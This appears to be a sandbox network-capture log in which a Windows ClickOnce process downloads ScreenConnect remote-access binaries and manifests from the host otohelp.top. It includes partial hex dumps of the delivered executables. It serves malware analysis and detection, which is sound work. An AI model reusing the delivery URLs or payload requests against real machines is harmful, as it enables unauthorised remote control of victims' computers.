2024-10-02 04:25:16 UTC	251	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 118084 Content-Type: application/x-ms-application; charset=utf-8 Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:16 GMT Connection: close
2024-10-02 04:25:16 UTC	16133	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41 Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41 Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62 Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 79 55 41 41 41 41 41 41 41 41 41 4a 67 45 41 41 43 42 42 41 48 41 41 63 41 42 73 41 47 6b 41 59 77 42 68 41 48 51 41 61 51 42 76 41 47 34 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 41 41 41 41 41 34 56 51 42 75 41 47 51 41 5a 51 42 79 41 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 51 67 42 68 41 47 34 41 62 67 42 6c 41 48 49 41 56 41 42 6c 41 48 67 41 64 41 42 47 41 47 38 41 63 67 42 74 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAAAFBBRFBBRFBAVG+rv6NuXyUAAAAAAAAAJgEAACBBAHAAcABsAGkAYwBhAHQAaQBvAG4AVABpAHQAbABlAAAAAAA4VQBuAGQAZQByAEMAbwBuAHQAcgBvAGwAQgBhAG4AbgBlAHIAVABlAHgAdABGAG8AcgBt
2024-10-02 04:25:16 UTC	16384	IN	Data Raw: 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 Data Ascii: bXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxE
2024-10-02 04:25:16 UTC	3647	IN	Data Raw: 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 Data Ascii: AH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49716	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:18 UTC	93	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:18 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17866 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:18 GMT Connection: close
2024-10-02 04:25:18 UTC	16168	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-10-02 04:25:18 UTC	1698	IN	Data Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49723	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:22 UTC	95	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:22 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95520 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:22 GMT Connection: close
2024-10-02 04:25:22 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-10-02 04:25:22 UTC	16384	IN	Data Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
2024-10-02 04:25:22 UTC	16384	IN	Data Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@-P
2024-10-02 04:25:23 UTC	16384	IN	Data Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
2024-10-02 04:25:23 UTC	16384	IN	Data Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
2024-10-02 04:25:23 UTC	13816	IN	Data Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b Data Ascii: 3033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49725	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:23 UTC	103	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:23 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61216 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:23 GMT Connection: close
2024-10-02 04:25:23 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
2024-10-02 04:25:24 UTC	16384	IN	Data Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
